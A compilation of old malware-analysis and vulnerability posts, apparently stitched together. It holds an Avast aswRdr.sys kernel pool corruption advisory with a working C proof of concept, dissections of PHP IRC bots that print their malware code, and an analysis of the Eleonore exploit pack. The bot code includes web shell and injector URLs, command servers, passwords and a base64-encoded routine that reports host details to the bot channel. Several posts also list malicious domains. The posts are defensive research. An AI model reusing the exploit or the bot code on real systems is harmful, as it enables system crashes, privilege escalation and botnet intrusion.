003701A4 E8 57FEFFFF CALL 00370000 ;From Name to Address
003701A9 83C4 08 ADD ESP,8
003701AC 85C0 TEST EAX,EAX
003701AE 75 05 JNE SHORT 003701B5
003701B0 8B45 F8 MOV EAX,DWORD PTR SS:[EBP-8]
003701B3 EB 04 JMP SHORT 003701B9
003701B5 ^ EB 92 JMP SHORT 00370149
003701B7 33C0 XOR EAX,EAX
003701B9 8BE5 MOV ESP,EBP
003701BB 5D POP EBP
003701BC C3 RETN

this piece of code, retrives relative address from function's name.

003716B7 PUSH 0
003716B9 MOV EAX,DWORD PTR SS:[EBP-12C]
003716BF MOV ECX,DWORD PTR DS:[EAX+30]
003716C2 CALL ECX ;GetModuleHandle
..
003717CB MOV ECX,DWORD PTR SS:[EBP-12C]
003717D1 MOV EDX,DWORD PTR DS:[ECX+14]
003717D4 CALL EDX ;VirtualProtect
003717D6 MOV EAX,DWORD PTR SS:[EBP-0BC]
003717DC MOV DWORD PTR SS:[EBP-24],EAX

Avast aswRdr.sys Kernel Pool Corruption and Local Privilege Escalation

=============[Avast aswRdr.sys Kernel Pool Corruption and Local
Privilege Escalation]================

Author(s): Giuseppe 'Evilcry' Bonfa'
    AbdulAziz Hariri

E-Mail: evilcry {AT} GMAIL {DOT} COM
Website:   http://evilcry.netsons.org
    http://www.insight-tech.org
    http://evilcodecave.blogspot.com
    http://evilcodecave.wordpress.com


Copyright 2009 Giuseppe Bonfa'. All rights reserved.


***Disclosure Timeline***

Discover Date: -
PoC Code: porting C++ 26/09/2009
Vendor Notify: 26/09/2009
Vendor Reply: 15/09/2009
Vendor Fix: 15/10/2009

======================
Product Details:
======================

Affected Product: Avast antivirus (other versions could be affected)
Product Version: 4.8.1356.0
Vulnerable Compoonent: aswRdr.sys 4.8.1356.0 (avast! TDI RDR Driver)
Category: Local Denial of Service due to kernel memory corruption (BSOD)
  (untested) Local Privilege Escalation

Notes: Tested on XP Sp0-Sp2 fixed faulting process IExplorer 6

======================
Vulnerability Details:
======================

Avast's aswRdr.sys Driver does not sanitize user supplied input
IOCTL) and this lead to Kernel Heap Overflow that propagates
on the system with a BSOD and potential risk of Privilege Escalation.

==================
Technical Details:
==================

kd> !analyze -v

Bugcheck: BAD_POOL_HEADER

Arg1: 00000020, a pool block header size is corrupt.
Arg2: 8136c618, The pool entry we were looking for within the page.
Arg3: 8136c778, The next pool entry. <-- OVERWRITTEN HEADER
Arg4: 1a2c0001, (reserved)

POOL_ADDRESS: unable to get nt!MmSpecialPoolStart
unable to get nt!MmSpecialPoolEnd
unable to get nt!MmPoolCodeStart
unable to get nt!MmPoolCodeEnd
8136c618

STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be
wrong.
f7c70a18 80543c86 00000019 00000020 8136c618 nt+0x21925
f7c70a68 804f388c 8136c620 00000000 81571de8 nt+0x6cc86
f7c70abc 804fcfbf 81571de8 f7c70b08 f7c70afc nt+0x1c88c
f7c70b0c 806d1c35 00000000 00000000 f7c70b24 nt+0x25fbf
f7c70b24 806d1861 badb0d00 00000000 81603548 hal+0x2c35
f7c70bb4 804f0498 81571de8 81348028 00000000 hal+0x2861
f7c70be8 f76ee9ad 81347ec8 81565740 00000000 nt+0x19498
f7c70c1c f76ee333 81347ec8 81571da8 81664e28 aswRdr+0x9ad
f7c70c58 805749d1 81347ec8 81571da8 81348028 aswRdr+0x333
f7c70d00 8056d33c 0000001c 00000000 00000000 nt+0x9d9d1
f7c70d34 8053c808 0000001c 00000000 00000000 nt+0x9633c
f7c70d64 7c91eb94 badb0d00 0012fee0 04040404 nt+0x65808
f7c70d68 badb0d00 0012fee0 04040404 04040404 0x7c91eb94
f7c70d6c 0012fee0 04040404 04040404 00000000 0xbadb0d00
f7c70d70 04040404 04040404 00000000 00000000 0x12fee0
f7c70d74 04040404 00000000 00000000 00000000 0x4040404
f7c70d78 00000000 00000000 00000000 00000000 0x4040404


==================
Proof of Concept:
==================

Exploitation for Privilege Escalation is not Trivial but Possible


+---------------------------------------------------------------------------+
/* Avast 4.8.1356.0 antivirus aswRdr.sys Kernel Pool Corruption
*
* Author(s): Giuseppe 'Evilcry' Bonfa'
*            AbdulAziz Hariri
* E-Mail: evilcry _AT_ gmail _DOT_ com
* Website: http://evilcry.netsons.org
*          http://evilcodecave.blogspot.com
*          http://evilcodecave.wordpress.com
*     http://evilfingers.com
*
*  Disclosure Timeline: As specified in the Advisory.
*/

#define WIN32_LEAN_AND_MEAN
#include 
#include 


BOOL OpenDevice(PWSTR DriverName, HANDLE *lphDevice) //taken from esagelab
{
 WCHAR DeviceName[MAX_PATH];
 HANDLE hDevice;

 if ((GetVersion() & 0xFF) >= 5)
 {
  wcscpy(DeviceName, L"\\\\.\\Global\\");
 }
 else
 {
  wcscpy(DeviceName, L"\\\\.\\");
 }

 wcscat(DeviceName, DriverName);

 printf("Opening.. %S\n", DeviceName);

 hDevice = CreateFileW(DeviceName, GENERIC_READ | GENERIC_WRITE, 0,
NULL, OPEN_EXISTING,
  FILE_ATTRIBUTE_NORMAL, NULL);

 if (hDevice == INVALID_HANDLE_VALUE)
 {
  printf("CreateFile() ERROR %d\n", GetLastError());
  return FALSE;
 }

 *lphDevice = hDevice;

 return TRUE;
}

int main()
{
 HANDLE hDev = NULL;
 DWORD Junk;

 if(!OpenDevice(L"aswRDR",&hDev))
 {
  printf("Unable to access aswMon");
  return(0);
 }

 char *Buff = (char *)VirtualAlloc(NULL, 0x156, MEM_RESERVE |
MEM_COMMIT, PAGE_EXECUTE_READWRITE);

 if (Buff)
 {
  memset(Buff, 'A', 0x156);

DeviceIoControl(hDev,0x80002024,Buff,0x156,Buff,0x156,&Junk,(LPOVERLAPPED)NULL);
  printf("DeviceIoControl Executed..\n");
 }
 else
 {
  printf("VirtualAlloc() ERROR %d\n", GetLastError());
 }


 return(0);
}


========
Credits:
========

Vulnerability found and advisory written by Giuseppe 'Evilcry' Bonfa'
and AbdulAziz Hariri.

===========
Disclaimer:
===========

The information within this advisory may change without notice. Use
of this information constitutes acceptance for use in an AS IS
condition. There are no warranties, implied or express, with regard
to this information. In no event shall the author be liable for any
direct or indirect damages whatsoever arising out of or in connection
with the use or spread of this information. Any use of this
information is at the user's own risk.


Regards,
Giuseppe

PHPSpyScanBot Analysis

Hi,

Again a PHP Infection, this time we are going to see how works PHPSpyScanBot that affects
http://******.fileave.com/1.txt website.

/******************************************
/* FeeLCoMz AI PHPSpyScanBot v1.8 *
/* By FaTaLisTiCz_Fx *
/* Copyleft Mei 2008 *
/* #CyBeRz #Javahack @ irc.allnetwork.org *
/******************************************
*/

Entire code is placed into one function hajar()

Initially we have a list of Irc Channels used by SpyScanBot, here a quick list of these
chans

function hajar() {
$versi = "v1.8";
//Configuration
$channels = '#bjork #gbc #g15 #scanner #Xd #bozot #ucid4 #sky #google #rose_banditz #jember #komputek #surabaya #shopping #online #on #monjali #manado #kill-9 #liqo #kotamobagu #indohacher #izel #checking #ccvalid #chking #chkbot #hn-community #eni #rose_banditz #blackhole #balihack #tauanzao #aku #aff #anakbugis #armin #butonhackerlink #bombat #web4cc #cc2bank #chk #dead #computer #check #chkon #dcc #efe #free #gorontalo';

successively there is a list of configuration settings, like

$spyscan = TRUE; //TRUE, Cari. FALSE, Diem.
$myinject = 'http://uaedesign.com/cyberz.txt?';
$myid = 'http://legalref.ru/cyberz/id.txt?';
$mylogger = 'http://legalref.ru/cyberz/logs/fxscanlogger.php?';
$myshelluploader = 'http://legalref.ru/cyberz/uploadshell.txt?';
$mypsyinstaller = 'http://legalref.ru/cyberz/installpsy.txt?';
$mytargetlog = 'http://h1.ripway.com/gaboek/target.txt';

These last five variables contais other files located in various servers that accomplish to the
following functionalities:

1. ID Tracker
2. Logging
3. Shell Update
4. PHPSpyInstaller
5. List of targets
6. Injector

Suddenly an array of URLs is builded

$targetlist = array();
$targetok = array();
$gantilist = array(
'http://h1.ripway.com/bsnet/a.txt?',
'http://83.222.131.90/~legitimi/mybase/r57.txt?',
'http://politics.wwf.gr/help/css/faq.txt?',
'http://master/admin/c99/text??',
'http://www.preman.com/galee??',
'http://Preman-crew.gila/kill.txt??',
'http://h1.ripway.com/rebrov/leonardo.txt?',
'sempakakaka???',
'http://municoinco.cl/weba/asu.txt??',
'http://cuteonlinegames.com/r57.txt?',
'http://xiki.net/test.txt?',
'http://fuck.u/box?????',
);

It's interesting to see that these links points to the most famous php kits

1. r57
2. c99
3. etc..

there is also an ignore list like this

$scanlist = array('http','ftp');
$ignorelist = array(
'.detik',
'/accesswatch-1.32/',
'/aws/',
'/bugtraq/',
'/count/full.php/',
..and so on..

$nicklist = array(
"kibba","suci","marni","sumar","sukar",
"sobiri","munif","wantini","poniman","siti","anis",
"dangkel","mahmod"
);
$identify = "password"; //Password Nick Bot
$identlist = array(
"aL-hud","aL-hud","aL-hud","aL-hud","aL-hud",
"aL-hud","aL-hud","aL-hud","aL-hud","aL-hud","aL-hud","aL-hud",
);

we can extract password, allowed nicks and ident

if ($localtest == 1) { $remotehost2 = array("localhost"); }
else { $remotehost2 = array("irc.mildnet.org"); }
$port = "6667";
$quitmsglist = array("Shutting Down","Fatal Error","Undefined Function",
"Turn off","Wrong Command");

irc.mildnet.org and port 6667 used

and here an interesting information to perform an in depth analysis

$admin = 'paijow';
$bot_password = 'temi'; //Password untuk auth bot

let's now see the functionalities of this bot by watching help list:

• " 12auth - Login ke bot",
• " 12deauth - Logout dari bot",
• " 12pass - Mengeset password bot",
• " 12chgpass - Mengganti password bot",
• " 12adduser - Menambah master/user bot",
• " 12deluser - Menghapus master/user bot",
• " 12`auth - Status anda di channel (Channel)",
• " 12!auth - Status otorisasi anda",
• " 12!msg - Mengirim pesan",
• " 12!notice - Mengirim notice",
• " 12!cycle - Hop di channel (Channel) (Admin/Master)",
• " 12!join - Join channel (Admin/Master)",
• " 12!part [channel] [alasan] - Part dari channel (Admin)",
• " 12!botnick - Ganti nick (Admin/Master)",
• " 12!away [alasan] - Meminta nick untuk Away",
• " 12!chanlist - Melihat daftar channel bot",
• " 12!userlist - Melihat daftar user",
• " 12!quit [pesan] - Quit dari IRC (Admin)",
• " 12!vhost [vhost] - Mengganti Vhost",
• " 12!jump [server] - Mengganti Server bot",
• " 12!help - Melihat help (Query)",
• " 4.: Public Commands :.",
• " 12!urlenc | !urldec - URL Encoder/Decoder",
• " 12!b64enc | !b64dec - Base64 Encoder/Decoder",
• " 12!tes - Melihat info target",
• " 4.: Core Commands :.",
• " 12!start - Mengaktifkan SpyBot",
• " 12!stop - Menonaktifkan SpyBot",
• " 12!scan - Menscan di channel Scanner",
• " 12!scan - Menambah/menghapus/melihat daftar Scan Trigger",
• " 12!ignore - Menambah daftar Ignore",
• " 12!delignore - Menghapus daftar Ignore",
• " 12!ignorelist - Melihat daftar ignore",
• " 12!ganti - Menambah daftar inject yg akan diganti",
• " 12!delganti - Menghapus daftar Ganti",
• " 12!gantilist - Melihat daftar inject yg diganti",
• " 12!tanam - Mengupload shell ke target (Admin/Master)",
• " 12!status - Melihat status sekarang",
• " 4.: Admin Core Commands :.",
• " 12!target - Target yg ditemukan oleh bot",
• " 12!raw - Mengirim RAW IRC Command",
• " 12!eval - Mengeksekusi kode PHP pada Bot",

Functionalities can be divided in

• Common Functionalities
• Public Functionalities
• Scan Functionalities
• Admin Functionalities

This is how connection is performed, a classical one with echo prints

echo "";
echo "Melakukan koneksi ke $remotehost...";
do {
$fp = fsockopen($remotehost,$port, $err_num, $err_msg, 60);
//Jika koneksi gagal
if(!$fp) {
if ( $counterfp <= 200 ) { $counterfp = $counterfp + 1; hajar(); } else { echo "
Ga bisa connect ke $remotehost! Coba server lain dgn me-Refresh Browser anda!";
$keluar = 1;
exit;
}
}

follows identification to the irc server

$header = 'NICK '.$nick . CRL;
$header .= 'USER '.$username.' '.$localhost.' '.$remotehost.' :'.$realname . CRL;
fputs($fp, $header);
$response = '';

and packet receiving, if a certain string is sent

fputs($fp, 'PRIVMSG nickserv :identify '.$nick.' '.$identify.CRL);
if ($nickmode) { fputs($fp, 'MODE '.$nick.' :'.$nickmode.CRL); }
/*** Notice Bot Admin ***/
fputs($fp, 'NOTICE ' . $admin . ' :BozZ..!'.CRL);
fputs($fp, base64_decode("Sk9JTiAjRmVlTENvTXo=").CRL);

by decoding the base64 string we obtain the default chan JOIN #FeeLCoMz
command parsing is accomplished in this way:

elseif ($dcom[0]=='PRIVMSG') {
$pesan = ltrim($iText,":");
$pesanlo = strtolower($pesan);
$com = explode(' ',$pesan);
$chan = strtolower($dcom[1]);

now let's see the most interesting commands

elseif ($com[3]==': INFO ') {
eval(base64_decode("JGJob3N0ID0gJF9TRVJWRVJbJ0hUVFBfSE9TVCddOyRiaXAgPSAk
X1NFUlZFUlsnU0VSVkVSX0FERFInXTskYnBocCAgPSAkX1NFUlZFUlsnUEhQX1NFTEY
nXTskYnJ1cmkgPSAkX1NFUlZFUlsnUkVRVUVTVF9VUkknXTskYnJpcCA9ICRfU0VSVk
VSWydSRU1PVEVfQUREUiddO2ZwdXRzKCRmcCwiUFJJVk1TRyAjRmVlTENvTXogOkhv
c3Q6ICRiaG9zdCB8IFJlZmVyZXI6ICRicnVyaSB8IFNjcmlwdDogJGJwaHAgfCBJUDogJGJp
cCB8IE93bmVyIElQOiAkYnJpcCAiLiBDUkwpOw=="));

that decoded displays generic informations

$bhost = $_SERVER['HTTP_HOST'];$bip = $_SERVER['SERVER_ADDR'];$bphp = $_SERVER['PHP_SELF'];$bruri = $_SERVER['REQUEST_URI'];$brip = $_SERVER['REMOTE_ADDR'];fputs($fp,"PRIVMSG #FeeLCoMz :Host: $bhost | Referer: $bruri | Script: $bphp | IP: $bip | Owner IP: $brip ". CRL);

Core Commands

elseif ($com[3]==':!target' && $auth["$dNick"]["status"]=="Admin") {
if ($com[4]=='clear') {
unset($targetlist);
fputs($fp,'PRIVMSG '.$dNick.' : 4Daftar target dihapus!'. CRL);
}

this clear target list.

elseif ($com[4]=='list') {
if (!empty($com[5])) { $sendnick = $com[5]; }
else { $sendnick = $dNick; }
fputs($fp,'PING 12886241614'. CRL);
$msgdelay = 0;
fputs($fp,'PRIVMSG '.$sendnick.' : 12[ Internal Target ('.count($targetlist).') ]'. CRL);
sort($targetlist);
foreach ($targetlist as $baris) {
$msgdelay++;
if($msgdelay >= 2) { sleep(3) ; $msgdelay = 0; }
fputs($fp,'PRIVMSG '.$sendnick.' :'.$baris. CRL);
}
fputs($fp,'PRIVMSG '.$sendnick.' : 12[ The End ]'. CRL);

this send a private message with target list to the nick that requested it

elseif ($com[4]=='total') {
fputs($fp,'PRIVMSG '.$dNick.' : 12Total Target Internal: '.count($targetlist). CRL);
}

target count.

elseif ($com[4]=='log') {
if (!empty($com[6])) { $sendnick = $com[6]; }
else { $sendnick = $dNick; }
fputs($fp,'PING 12886241614'. CRL);
$isi = file_get_contents($mytargetlog,FILE_TEXT);
$isi = nl2br($isi);
$isi = str_replace("\n","",$isi);
$isi = str_replace("\r","",$isi);
$targetlog = explode("
",$isi);
if ($com[5] == 'show') {
fputs($fp,'PRIVMSG '.$sendnick.' : 12[ Daftar Target ('.count($targetlog).') ]'. CRL);
$msgdelay = 0;
foreach ($targetlog as $baris) {
$msgdelay++;
if($msgdelay >= 2) { sleep(3) ; $msgdelay = 0; }
if ($baris) { fputs($fp,'PRIVMSG '.$sendnick.' :'.$baris. CRL); }
}
fputs($fp,'PRIVMSG '.$sendnick.' : 12[ The End ]'. CRL);
}
else {
fputs($fp,'PRIVMSG '.$sendnick.' : 12Total Target 1['.count($targetlog).']'. CRL);
}
}

the logger functionality saves the targets.

elseif ($com[3]==':!psy' && $auth["$dNick"]["status"]!="User") {
$testurl = str_pesan($com[3],$data);
$theurl = $testurl.$mypsyinstaller;
$isi = implode('', @file($theurl));
$posisi = strpos($isi,".fx");
$isi = substr($isi,$posisi);
if ($posisi === FALSE) {
if ($chan) { fputs($fp,'PRIVMSG '.$chan.' :4 Ga bisa install psyBNC!'.CRL); }
else { fputs($fp,'PRIVMSG '.$dNick.' 1 Ga bisa install psyBNC!'.CRL); }
}
else {
fputs($fp,'PRIVMSG '.$dNick.' :1 installed on:14 '.$testurl.CRL);
fputs($fp,'PRIVMSG '.$dNick.' :12H1asil:14 '.$isi.CRL);
}
unset($isi);
}
}

in a first istance checks if there is a psyBNC installed if yes, informs user elseif is not installed performs a psyBOT installation by taking it from the config url list already seen.

elseif ($com[3]==':!scan') {
if ($com[4]=='add' && $com[5]) {
$msg = str_pesan($com[3].' '.$com[4],$data);
if (!in_array($msg,$scanlist)) {
$scanlist[] = $msg;
if ($chan) { fputs($fp,'PRIVMSG '.$chan.' :Seep..! 12 '.$msg.' ditambahkan!'.CRL); }
else { fputs($fp,'PRIVMSG '.$dNick.' :Seep..! 12 '.$msg.' ditambahkan!'.CRL); }
}
else { fputs($fp,'NOTICE '.$dNick.' :12 '.$msg.' sudah ada!'.CRL); }
}
elseif ($com[4]=='del' && $com[5] && $auth["$dNick"]["status"]!="User") {
$msg = str_pesan($com[3].' '.$com[4],$data);
if (in_array($msg,$scanlist)) {
$daftar = join(' ',$scanlist);
unset($scanlist);
$daftar = str_replace($msg,'',$daftar);
$scanlist = explode(' ',$daftar);
if ($chan) { fputs($fp,'PRIVMSG '.$chan.' :OKey..!12 '.$msg.' dihapus!'.CRL); }
else { fputs($fp,'PRIVMSG '.$dNick.' :OKey..!12 '.$msg.' dihapus!'.CRL); }
}
unset($daftar);
}

if is specified !scan add application adds scan result to a list, else if specified !scan del deletes from list.

[Crimeware] Researches about Eleonore Exploit Pack

Hi,

Today we will see how works Eleonore Exploit Pack directly from an infected website.

Essentially Eleonore Exploit Pack is a collection of Exploits and Data Statistics Collectors, this is the 'marketing' presentation of the exploit pack:

*---------------------------------------------------------------*
Hello!
I present new actual russian exploits pack "Eleonore Exp v1.2"


Exploits on pack:
> MDAC
> MS009-02
> Telnet - Opera
> Font tags - FireFox
> PDF collab.getIcon
> PDF Util.Printf
> PDF collab.collectEmailInfo
> DirectX DirectShow
> Spreadsheet

installs on traffic:
> on usa: 5-15%
> on mix: 10-25%
[size=1]* Piercing indicates approximate, may vary and depends directly on the type and quality of traffic. size]


Price:
> Eleonore Exp Pack 1.2 = 700$
> Cleans cryptor on AV = 50$
> Rebild on another domain = 50$
* PACK is binding on domain.
> Eleonore Exp Pack 1.2 with not binding domain(free on domain) = 1500$

*---------------------------------------------------------------*

Here you can read a discussion where there is the direct author of this pack

http://www.opensc.ws/trojan-malware-releases/7443-eleonore-exp-new-actual-russian-exploits-pack.html

Eleonore Exp. Pack exists two versions of Eleonore Exploit Pack:

1. Eleonore Exp v1.1
2. Eleonore Exp v1.2
3. Eleonore Exp v1.3B
   

The last version (1.3B) presents new exploits, connectivity and optimization improvements in the intelligence process for obtaining data statistics related to zombies (countries, navegadote, OS, etc.).

By watching the URL we can immediately extract a list of most interesting links:

1. http://*****.cn/sv/x.x
2. http://*****.cn/sv/Client2.jar
3. http://*****.cn/sv/pdf.php
4. http://*****.cn/sv/?spl=2&br=MSIE&vers=7.0&s=ec445bc5411c202a8361c7db463e84b4
5. http://*****.cn/sv/load.php?spl=ActiveX_pack
6. http://*****.cn/sv/stat.php

As you can see all is contained int /sv/ directory, now let's check for example load.php link,
when accessing this link is downloaded an executable called load.exe with

MD5: 50AC484D4775B783D70D87A21BBFAA36

That submitted to the various online AV scanners results to be free from infections, we have 4 sections:

.text 0x1000 0x48B0 0x4A00 7.39 5135f06000479a5b2e378caa2c4fd8a9
.rdata 0x6000 0x26D 0x400 3.07 8492531c69aab5794ba61207842ba4d6
.data 0x7000 0x2AA7 0x2C00 6.71 092b8e63ebe1ac83d571aba964e041d1
.rsrc 0xA000 0x46C 0x600 4.07 aceb78467d14ed7c7023da0ff5fc59ef

and this is the Import Table list

kernel32.dll: SetFilePointer, HeapUnlock, VerifyVersionInfoA, GetLongPathNameA, _lclose, GetEnvironmentStringsW, HeapDestroy, GetLocaleInfoW, HeapAlloc, GetFileType, HeapCreate, WaitForSingleObjectEx, lstrcmpiA, SetCalendarInfoA, HeapFree, lstrcatW, ExitProcess, SetLastError, VirtualProtect, GetFullPathNameA, SetUnhandledExceptionFilter, lstrcpyW, GlobalFindAtomA

Application presents a Number of Hidden (Packing) Layers of 3.

This is a quick list of operations performed by load.exe

First Thread
71a370df RegOpenKeyExA (HKLM\System\CurrentControlSet\Services\WinSock2\Parameters)
71a37cc4 RegOpenKeyExA (Protocol_Catalog9)
71a3737e RegOpenKeyExA (0000000B)
71a3724d RegOpenKeyExA (Catalog_Entries)

Application accesses Winsock2 parameters.

Second Thread
401129 CreateFileA(C:\DOCUME~1\evilcry\IMPOST~1\Temp\2A.tmp)
401561 LoadLibraryA(C:\DOCUME~1\evilcry\IMPOST~1\Temp\2A.tmp)=602c0000

Creates 2A.tmp

602c4955 LoadLibraryA(kernel32.dll)=7c800000
602c4cbb LoadLibraryA(ntdll.dll)=7c910000
602c4d13 LoadLibraryA(ws2_32.dll)=71a30000
602c4e52 LoadLibraryA(advapi32.dll)=77f40000
76d2563d GetVersionExA()
76d258ef CreateFileA(\\.\Ip)

Performs an access to IP Device

76d25bc2 RegOpenKeyExA (HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Linkage)
76d25bdc RegOpenKeyExA (HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\)
76d25bf3 RegOpenKeyExA (HKLM\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces)
76d25c0d RegOpenKeyExA (HKLM\SYSTEM\CurrentControlSet\Services\NetBT\Parameters)

opens the most important registry entries about Networking

602c4f3a LoadLibraryA(iphlpapi.dll)=76d20000
5b19ef89 GetCurrentProcessId()=2436
5b18b1ba IsDebuggerPresent()
746b26aa GetVersionExA()
746b30a7 RegOpenKeyExA (HKLM\SOFTWARE\Microsoft\CTF\Compatibility\load.exe)
746b30a7 RegOpenKeyExA (HKLM\SOFTWARE\Microsoft\CTF\SystemShared\)

Checks the presence of a debugger and register itself in Compatibility and SystemShared entries


746b245b CreateMutex(CTF.LBES.MutexDefaultS-1-5-21-854245398-1229272821-725345543-1003)
746b245b CreateMutex(CTF.Compart.MutexDefaultS-1-5-21-854245398-1229272821-725345543-1003)
746b245b CreateMutex(CTF.Asm.MutexDefaultS-1-5-21-854245398-1229272821-725345543-1003)
746b245b CreateMutex(CTF.Layouts.MutexDefaultS-1-5-21-854245398-1229272821-725345543-1003)
746b245b CreateMutex(CTF.TMD.MutexDefaultS-1-5-21-854245398-1229272821-725345
543-1003)

Creates a list mutex, presumibly linked to keyboard ( keystroke logger)

746b30a7 RegOpenKeyExA (HKCU\Keyboard Layout\Toggle)
746b260a RegOpenKeyExA (HKLM\SOFTWARE\Microsoft\CTF\)

Will act as a keylogger

775220b0 LoadLibraryA(CLBCATQ.DLL)=76f90000
775228a1 LoadLibraryA(CLBCATQ.DLL)=76f90000

CLBCATQ.DLL its a COM Service DLL

602c214f CreateProcessA((null),svchost.exe,0,(null))
7c81628b WaitForSingleObject(6d8,64)
77b14cd7 LoadLibraryA(VERSION.dll)=77bd0000
7c818e2c LoadLibraryA(advapi32.dll)=77f40000
10001e25 LoadLibraryA(psapi.dll)=76bb0000
10001e66 GetCurrentProcessId()=2436
76bb183b ReadProcessMemory(h=6e0)
76bb185a ReadProcessMemory(h=6e0)
76bb1878 ReadProcessMemory(h=6e0)
76bb17bb ReadProcessMemory(h=6e0)
WriteProcessMemory=1 BufLen=23 BytesWritten:23

This mean that load.exe is going to infect svchost.exe surely to enstablish a channel
with malicious sites.

602c15c7 Copy(C:\DOCUME~1\evilcry\IMPOST~1\Temp\2A.tmp->C:\WINDOWS\system32\helh.oso)
7c82fa88 WriteFile(h=700)

The content of 2A.tmp is copied into \WINDOWS\system32\helh.oso

602c298f RegOpenKeyExA (HKCR\idid)
602c2d4d RegCreateKeyExA (HKCR\idid,(null))
602c2d92 RegSetValueExA (url0)
602c2c3b RegOpenKeyExA (HKCR\idid)
76d22bd0 RegOpenKeyExA (HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{D1D028D3-3E11-436A-8FD8-8A4993A911A5})
602c267d gethostbyname(602c8760)

infection of svchost.exe is done and application attempt to access some URLs, that can be
revealed with a network sniff

• papaanarhia.cn
• papaanarhia.cn.localdomain

Now let's reverse helh.oso.

By disassembling it emerges a DLL with the following entries:

• DllMain
• DllEntryPoint
• DllEntryPoint
  
• dxdll
• vtfeb
  
• ruagpi
• vlecvja

interesting strings:

libgcj_s.dll
Jv_RegisterClasses
'GET /%s HTTP/1.1'
'User-Agent: Opera\9.63',
'Host: %s',0Dh,0AhBackdoor.Win32.Bredavi.aig

so load.exe acts like a malicious backdoor trojan that runs in the background and allows remote access to the compromised system. Interesting to note that the domain used is the same of

• Backdoor.Win32.Bredavi.aig
• Trojan.Win32.Sasfis.qri

helh.oso downloads and/or requests other files from Internet, from the following URLs

• http://bookheads.cn/dib-file.exe
• http://papaanarhia.cn/myl/bb.php?id=199826733&v=200&tm=2&b=01
• http://papaanarhia.cn/myl/bb.php?id=199826733&v=200&tm=2&b=01&tid=3&r=1

Now let's check /sv/x.x

function fokusp(Lomka,kolma)
{
return eval('Lom'+'ka.rep'+'lace('+'/KOHb55544 3233/g'+',kolma)');
}

/sv/stat.php

is the login page where user is asked to insert username and password

/sv/pdf.php

downloads GDGCavPJwlrd.pdf a malicious pdf

See you to the next post.. :)

[Malware] BDS/PHP.Agent.DW.8 Dissection

Hi,

Today again an RFI infection, the target to dissect is BDS/PHP.Agent.DW.8 that works
as BOT.

/***********************************
/* Guard Cakep Powered By dendy *
/* Female Character *
/* Copyleft Pebruari 2009 *
/* #pangkul @ irc.allnetwork.org *
/* vj_dendy@yahoo.co.id *
/***********************************
/*
/* Perhatian:
/* Joinkan hanya satu Bot dalam satu channel untuk menghindari terjadinya saling sapa antar bot.
/*
/* Perintah Dasar:
/* auth - Untuk otorisasi
/* !join [#channel] - Join channel
/* !part [#channel] - Part channel
/* !msg - Mengirim pesan ke channel atau ke nick
/* !botnick [nick] [password] - Mengganti nick bot
/* !jump [server] - Mengganti server bot
/* !help - Melihat daftar perintah
/* !ngomong - Memperbolehkan bot untuk berbicara di semua channel
/* !diam - Melarang bot untuk berbicara di semua channel
*/

this bot supports the classical commands linked to irc plus !jump !ngomong and !diam that we
will analyze.

function hajar() {

$channels = '#pangkul'; //Pisahkan tiap channel dengan spasi
$admin = 'VJ_dEnDy';
$bot_password = 'jembod'; //Password untuk auth bot
$ngomong = TRUE; //TRUE, Ngomong. FLASE, Diem.
$autowelcome = TRUE; //TRUE, AutoWelcome On. FLASE, AutoWelcome off.
$versi = "v1.7";
$showresponse = 0; //1, Nampilin respon dari server irc
$localtest = 0; //1, Coba di localhost. 0, connect ke server irc

this reveal all things necessary to a Digital Investigations, indeed we know server, chan and
passwords.

//Nick Bot
$nicklist = array("VJ1","VJ2","VJ3","VJ4","VJ5",
"VJ6","VJ7","VJ8","VJ9","VJ10","VJ11");
$identify = "230283"; //Password Nick Bot
//Ident Bot
$identlist = array("dendy",);
//Realname Bot
$namabot = array("d3ndy",);
//Asl Bot
$aslbot = array("dari chanel pangkul",);
//Pesan Quit
$quitmsglist = array("mau ngintip anak tetangga mandi :D","Bye All..");

other informations for NickBot access

$namaku = $namabot[rand(0,count($namabot) - 1)];
$aslku = $aslbot[rand(0,count($aslbot) - 1)];

there are identities for NickBot as you can see obtained with a Random function.

and here an interesting thing, an array of the various irc servers

if ($localtest == 1) { $remotehost2 = array("localhost"); }
else {
$remotehost2 = array(
"irc.cbn.net.id",
"irc.allnetwork.org",
"irc.elnus.net.id",
"irc.velo.net.id",
"irc.indika.net.id",
"irc.indo.net.id",
"irc.circleone.net.id",
"irc.ads.net.id",
"irc.jmn.net.id",
"202.146.180.46",
"irc.big.net.id",
"irc.sbp.net.id",
);
}
$port = "6667";

successively we have the Welcome Message and Mood List that I'll jump
cause are unuseful for our scopes. Funny a list of bad words

//Special Words
$badwordlist = array("jancuk","babi","puki","s0so","s0s0","sos0","s0h","sosoh","k3h","peller","peler","p4lak","p4l4k","pal4k","#","join di","tae","p3p3k","p3pek","pep3k","m3k","ngengek","p0k","embot","asyu","setan","ancrit","coex","coek","jancox","mencret","cox","jancok","palak","memek","patek","pepek","kontol","anjrit","anjink",
"fuck","entot","ngentot","taek","kelamin","ngesex","ml ","pokeh","anjing",
"poke","tempek","vagina","penis","luji","kodo",);
$pujianlist = array("cantik","baik","baek","cakep","ramah","pengertian","hebat",
"bagus","indah","jujur");
$cacianlist = array("bego","jelek","jelex","gendeng","edan","gilo","gila",
"sinting","dudul","dodol","jahat","goblok","geblek","sialan"," bau","stres");

//Flood Protection Setting
$maxkar = 200; //Maksimal karakter di channel

no more that 200 characters allowed

$helptext = array(
' 3,9? 0,1 ? ¬den¬ dy #pangkul '.$versi.' Help ? 3,9? ',
"-",
" 12auth - Login ke bot",
" 12deauth - Logout dari bot",
" 12pass - Mengeset password bot",
" 12chgpass - Mengganti password bot",
" 12adduser - Menambah master/user bot",
" 12deluser - Menghapus master/user bot",
" 12`auth - Status anda di channel (Channel)",
" 12!auth - Status otorisasi anda",
" 12!act - Bot action (Channel)",
" 12!slap - Slap nick (Channel)",
" 12!msg - Mengirim pesan",
" 12!notice - Mengirim notice",
" 12!ctcp - Request CTCP",
" 12!ping - Meminta bot untuk membalas dg pong (Channel)",
" 12!info - Melihat info bot (Admin)",
" 12!up - Meminta bot untuk menjadi @ di channel (Channel)",
" 12!down - Meminta bot untuk turun dari @ di channel (Channel)",
" 12!cycle - Hop di channel (Channel) (Admin/Master)",
" 12!part [channel] [alasan] - Part dari channel (Admin)",
" 12!join - Join channel (Admin/Master)",
